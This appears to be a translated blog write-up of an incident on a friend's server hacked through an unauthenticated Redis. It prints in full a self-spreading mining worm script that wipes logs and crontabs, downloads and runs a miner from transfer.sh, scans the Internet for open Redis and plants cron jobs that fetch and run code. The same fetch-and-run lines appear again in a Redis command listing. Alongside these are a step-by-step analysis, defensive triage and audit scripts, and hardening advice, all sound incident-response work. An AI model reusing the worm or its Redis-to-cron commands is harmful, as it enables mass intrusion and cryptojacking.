Notes on analysing and cleaning up a friend's hacked server

A friend I get on well with has just asked for help in a group chat.

After getting the server password from him I logged in and took a look: the box was mining cryptocurrency.

After I killed that process it did not come back, so I kept digging.

Next I found a large number of hidden files in the root directory.

I checked the recent logins and the command history and found nothing unusual. Since the server runs Redis, I guessed Redis was the way in (a brute-forced password, I assumed); when I checked with him it turned out he had never set a Redis password at all, so no brute force was needed: anyone who could reach port 6379 could issue commands. (As the script below shows, the empty logins and history are themselves part of the attack: it truncates wtmp, secure and .bash_history.)

After connecting with XFTP and turning on "show hidden files", I found several suspicious scripts, downloaded them and analysed them locally.

Start with the script with the strangest file name.

The script reads as follows:

sleep 1
find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete
[ -f .mxff0 ] && exit 0
echo 0 > .mxff0
trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
crontab -r 2>/dev/null
rm -rf /var/spool/cron 2>/dev/null
grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/* 2>/dev/null
rm -rf /var/tmp/* 2>/dev/null
rm -rf /etc/root.sh 2>/dev/null
sync && echo 3 > /proc/sys/vm/drop_caches
cat <<EOF > /etc/security/limits.conf
* hard nofile 100000
* soft nofile 100000
root hard nofile 100000
root soft nofile 100000
* hard nproc 100000
* soft nproc 100000
root hard nproc 100000
root soft nproc 100000
EOF
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done
rm -rf /tmp/* 2>/dev/null
rm -rf /var/tmp/* 2>/dev/null
echo 0 > /var/spool/mail/root
echo 0 > /var/log/wtmp
echo 0 > /var/log/secure
echo 0 > /root/.bash_history
YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"
DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"
if cat /etc/*release | grep -i CentOS; then
    yum clean all
    yum install -y -q epel-release
    yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Red; then
    yum clean all
    yum install -y -q epel-release
    yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Fedora; then
    yum clean all
    yum install -y -q epel-release
    yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Ubuntu; then
    export DEBIAN_FRONTEND=noninteractive
    rm -rf /var/lib/apt/lists/*
    apt-get update -q --fix-missing
    for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Debian; then
    export DEBIAN_FRONTEND=noninteractive
    rm -rf /var/lib/apt/lists/*
    apt-get update --fix-missing
    for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Mint; then
    export DEBIAN_FRONTEND=noninteractive
    rm -rf /var/lib/apt/lists/*
    apt-get update --fix-missing
    for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Knoppix; then
    export DEBIAN_FRONTEND=noninteractive
    rm -rf /var/lib/apt/lists/*
    apt-get update --fix-missing
    for PACKAGE in $DEB_PACKAGE_NAME; do apt-get install -y -q $PACKAGE; done
else
    exit 1
fi
sleep 1
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
    curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12
    sleep 1
    [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112
fi
tname=$( mktemp )
OMURL=https://transfer.sh/ly9S0/tmp.5ErvacTPRm
curl -s $OMURL > $tname || wget -q -O $tname $OMURL
NMURL=$( curl -s --upload-file $tname https://transfer.sh )
mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg
[ -z "$NMURL" ] && NMURL=$OMURL
ncmd=$(basename $(mktemp))
sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd
NSURL=$( curl -s --upload-file $ncmd https://transfer.sh )
echo 'flushall' > .dat
echo 'config set dir /var/spool/cron' >> .dat
echo 'config set dbfilename root' >> .dat
echo 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat
echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'save' >> .dat
echo 'config set dir /var/spool/cron/crontabs' >> .dat
echo 'save' >> .dat
echo 'exit' >> .dat
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
for x in $( seq 1 224 | sort -R ); do
    for y in $( seq 0 255 | sort -R ); do
        $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
        awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
        while read -r h p; do
            cat .dat | redis-cli -h $h -p $p --raw &
        done < .r.$x.$y.l
    done
done
echo 0 > /var/spool/mail/root 2>/dev/null
echo 0 > /var/log/wtmp 2>/dev/null
echo 0 > /var/log/secure 2>/dev/null
echo 0 > /root/.bash_history 2>/dev/null
exit 0

This script does the following:

  1. Creates a marker file .mxff0 so that only one copy runs at a time (a marker older than 60 minutes is deleted first, so a copy that died without cleaning up only blocks the next one for an hour), and sets an EXIT trap that removes its work files (.m*, .cmd, tmp.*, .r, .dat) and the script itself.

  2. Disables SELinux, wipes every crontab on the box (crontab -r and rm -rf /var/spool/cron), adds 8.8.8.8 to /etc/resolv.conf, empties /tmp and /var/tmp, and raises the nofile/nproc limits in /etc/security/limits.conf so that the scanner can hold many connections open.

  3. Inserts iptables rules so that port 6379 accepts connections from 127.0.0.1 only: it locks the door behind itself so other attackers cannot use the same hole. (On this CentOS 7 server the rules had not taken effect. Note that the script calls iptables before the yum step that installs the iptables package, so on a host without the binary the first run simply fails here.)

  4. Kills redis-server and a long list of rival miners and scanner scripts (nicehash, cryptonight, stratum, cpuminer, redisscan, ...) with kill -9. It kills processes; apart from emptying /tmp it does not delete their files.

  5. Truncates /var/spool/mail/root, /var/log/wtmp, /var/log/secure and /root/.bash_history to the two bytes "0\n", once here and again at the end (seriously?). This is why last and the bash history showed nothing.

  6. Installs gcc, make, redis (for redis-cli), curl, wget and iptables with yum or apt, depending on the distribution.

  7. Downloads the pnscan 1.12 source from GitHub, builds it and installs it. pnscan (github.com/ptrrkssn/pnscan) is an ordinary open-source parallel port scanner, not a worm; the worm logic is the shell script around it.

  8. Downloads the payload at OMURL (https://transfer.sh/ly9S0/tmp.5ErvacTPRm in this copy), saves it as .gpg, runs it and deletes it: this is the miner that was found running. Before that it re-uploads the same payload to transfer.sh to get a fresh URL (NMURL), rewrites .cmd so that it points at the fresh URL (the rewritten copy is named by mktemp, which is where files like tmp.Nm1jfFNPap come from) and uploads that copy too (NSURL). Every infected host therefore spreads from a URL nobody has seen before, which defeats URL-based blocklists.

  9. Writes .dat, a Redis command sequence that sets dir to /var/spool/cron and dbfilename to root, stores three cron lines as keys and calls save. Against an unauthenticated Redis running as root the RDB dump lands as root's crontab (the second dir/save pair covers the Debian/Ubuntu path /var/spool/cron/crontabs), and cron then fetches and runs .cmd from NSURL every 2, 5 and 10 minutes. This is the infection vector, presumably the same way this server was hit.

  10. Scans the Internet: for random /16 blocks from 1.0.0.0 to 224.255.0.0 it runs pnscan against port 6379, sending the bytes 2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a ("*1\r\n$4\r\ninfo\r\n", the RESP encoding of the INFO command) and matching replies that contain 6f 73 3a 4c 69 6e 75 78 ("os:Linux"). Every Linux Redis that answers gets .dat piped into redis-cli in the background, and pnscan's output for each block is left behind as /root/.r.x.y.o and .r.x.y.l.

Next I ran netstat -antp to look at the network connections.

When I tried to kill pnscan the process came straight back, so I assumed there was a watchdog process. (Looking at the script, the nested for loops start a fresh pnscan for every /16 block, so killing one instance only makes the loop move on to the next block; the bash process running the script is what has to be killed first.)

ps -ef | grep pnscan shows where the pnscan binary lives.

cd into /usr/local/bin and run ls:

and there it was, sitting quietly.

Let's see it off with rm -rf pnscan. Removing the binary alone is not enough, though: the bash script that drives it has to be killed first, and /var/spool/cron and /var/spool/cron/crontabs should be checked for a file named root that starts with the bytes REDIS, the dump that .dat plants; otherwise a surviving cron entry fetches .cmd again and rebuilds pnscan from GitHub.

The last step is to clean up the battlefield.

Since /root contains a large number of regularly named .r.x.y.o and .r.x.y.l files (pnscan's output for each /16 block; the EXIT trap only removes a file literally named .r, which is why they pile up), they can be deleted with a single pattern: rm -f /root/.r.*

A few more of the scripts from the root directory:

.cmd (identical in content to tmp.Nm1jfFNPap):

.cmd is, line for line, the same script as the one analysed above; the only difference is its OMURL line, which reads

OMURL=https://transfer.sh/GQCHp/tmp.pZR8v8kihR

(each generation rewrites this one line with the fresh transfer.sh URL it obtained by re-uploading the payload, so copies of the worm differ only here).

.dat (the command sequence piped into redis-cli against each victim to plant the cron jobs: flushall empties the database so the dump holds nothing but the three keys, config set dir/dbfilename makes the next save write the dump to /var/spool/cron/root, and the \t\n padding puts each cron line on a line of its own so cron parses it despite the binary RDB bytes around it; the second dir/save pair covers the Debian/Ubuntu crontab location):

flushall
config set dir /var/spool/cron
config set dbfilename root
set Backup1 "\t\n*/2 * * * * curl -s https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t"
set Backup2 "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/ZShKM/tmp.Nm1jfFNPap && bash .cmd\n\t"
set Backup3 "\t\n*/10 * * * * lynx -source https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t"
save
config set dir /var/spool/cron/crontabs
save
exit
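An added example (my own code, not from the original post) that covers both the trace list above and this .dat listing: a triage function that looks for what the script leaves behind. Run it as root on the live host, or give it a directory to examine a mounted disk image offline. The decisive check is the RDB magic: a file in /var/spool/cron that starts with the ASCII bytes REDIS was written by config set dir + save, never by crontab(1). The file names and the 2-byte log threshold follow the script above; the 8.8.8.8 nameserver check is only a weak signal on its own.

```shell
#!/bin/sh
# Added example: look for the traces left by the Redis-to-crontab script above.
# Usage: redis_cron_triage [ROOT]   -- ROOT defaults to /; point it at a mounted
# image (e.g. /mnt/evidence) to examine a disk offline.

# A Redis RDB dump always starts with the ASCII magic "REDIS" followed by the
# version number. A crontab that begins that way was written by
# "config set dir /var/spool/cron; config set dbfilename root; save".
is_rdb_file() {
    [ -f "$1" ] && [ "$(head -c 5 "$1" 2>/dev/null)" = "REDIS" ]
}

redis_cron_triage() {
    root="${1:-/}"
    hits=0

    # 1. crontabs that are really RDB dumps, or that pull .cmd from transfer.sh
    for d in "$root/var/spool/cron" "$root/var/spool/cron/crontabs"; do
        [ -d "$d" ] || continue
        for f in "$d"/*; do
            [ -f "$f" ] || continue
            if is_rdb_file "$f"; then
                echo "IOC rdb-as-crontab: $f"; hits=$((hits + 1))
            elif grep -qE 'transfer\.sh|bash \.cmd' "$f"; then
                echo "IOC cron-downloader: $f"; hits=$((hits + 1))
            fi
        done
    done

    # 2. work files the script keeps in root's home (.gpg is normally deleted
    #    after it runs; .mxff0 is the "a copy is running" marker)
    for n in .mxff0 .cmd .dat .gpg; do
        [ -e "$root/root/$n" ] && { echo "IOC workfile: /root/$n"; hits=$((hits + 1)); }
    done
    scans=$(find "$root/root" -maxdepth 1 -name '.r.*' 2>/dev/null | wc -l | tr -d ' ')
    [ "$scans" -gt 0 ] && { echo "IOC scan-output: $scans /root/.r.* files"; hits=$((hits + 1)); }

    # 3. the pnscan build the script installs
    for b in usr/local/bin/pnscan usr/bin/pnscan; do
        [ -x "$root/$b" ] && { echo "IOC pnscan: /$b"; hits=$((hits + 1)); }
    done

    # 4. logs the script overwrites with "echo 0 >" (2 bytes: "0\n")
    for l in var/log/wtmp var/log/secure var/spool/mail/root root/.bash_history; do
        f="$root/$l"
        if [ -f "$f" ] && [ "$(wc -c < "$f" | tr -d ' ')" -le 2 ]; then
            echo "IOC log-truncated: /$l"; hits=$((hits + 1))
        fi
    done

    # 5. the injected resolver (weak signal on its own: many admins add 8.8.8.8)
    if grep -qs '^nameserver 8\.8\.8\.8' "$root/etc/resolv.conf"; then
        echo "WEAK resolv.conf: nameserver 8.8.8.8"; hits=$((hits + 1))
    fi

    echo "total indicators: $hits"
    return 0
}

# Live-host use: run as root with no argument, e.g.
# [ "$(id -u)" -eq 0 ] && redis_cron_triage
```

On a live host, add ps -ef | grep -E 'pnscan|\.gpg|\.cmd' and netstat -antp for the running side of the picture; the function above only looks at the file system so that it can be pointed at an image.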

Hardening advice:

  1. Do not expose Redis to the Internet: bind it to 127.0.0.1 or a private address and leave protected-mode on.

  2. If it really has to be reachable, set a long requirepass and restrict the clients with a firewall allow-list. In addition, rename or disable the CONFIG command (rename-command CONFIG ""), since config set dir/dbfilename is the step that turns a dump into a crontab, and run Redis as an unprivileged user so that its dumps cannot land in /var/spool/cron or /root at all.

  3. Back up regularly and review the server logs, ideally on a remote log host: this script truncates wtmp, secure and .bash_history on the box, so a 2-byte log file is itself an indicator, not a clean bill of health.
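An added example, not from the original post: a shell audit of redis.conf for the settings behind these recommendations. The 16-character minimum for requirepass is this example's own threshold (Redis imposes none), and each check uses the last uncommented occurrence of a directive, which is the effective one because Redis reads the file top to bottom. The function prints one FINDING line per problem and returns non-zero if there is any.

```shell
#!/bin/sh
# Added example: audit a redis.conf for the settings that would have blocked
# this worm. Prints one FINDING line per problem and returns non-zero if any.
# Usage: audit_redis_conf /etc/redis/redis.conf

# Value of the last uncommented occurrence of directive $1 in file $2;
# empty if it is not set.
last_directive() {
    sed -n "s/^[[:space:]]*$1[[:space:]][[:space:]]*//p" "$2" | tail -n 1
}

audit_redis_conf() {
    conf="$1"
    findings=0

    # 1. authentication: the friend's instance had no requirepass at all.
    #    16 chars is this example's minimum; Redis itself imposes none.
    pass=$(last_directive requirepass "$conf" | tr -d '"')
    if [ "${#pass}" -lt 16 ]; then
        echo "FINDING requirepass missing or shorter than 16 chars"
        findings=$((findings + 1))
    fi

    # 2. exposure: with no bind line Redis listens on every interface.
    bind=$(last_directive bind "$conf")
    case "$bind" in
        ""|*0.0.0.0*|*"*"*)
            echo "FINDING bind unset or wildcard ($bind): port 6379 is reachable from outside"
            findings=$((findings + 1)) ;;
    esac

    # 3. protected-mode (Redis 3.2+) refuses remote clients when neither a
    #    password nor a bind address is set; "no" removes that safety net.
    if [ "$(last_directive protected-mode "$conf")" = "no" ]; then
        echo "FINDING protected-mode no"
        findings=$((findings + 1))
    fi

    # 4. CONFIG SET dir/dbfilename is the step that turns a dump into a
    #    crontab; rename-command CONFIG "" disables the command entirely.
    if ! grep -qE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' "$conf"; then
        echo "FINDING CONFIG command is not renamed or disabled"
        findings=$((findings + 1))
    fi

    echo "findings: $findings"
    [ "$findings" -eq 0 ]
}

# Example: audit_redis_conf /etc/redis/redis.conf
```

On Redis 6 and later, ACLs are the cleaner way to take CONFIG away from application users; rename-command still works and is what the older CentOS 7 packages offer. Whatever the mechanism, run Redis as its own user: a dump written by a non-root process cannot become /var/spool/cron/root in the first place.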

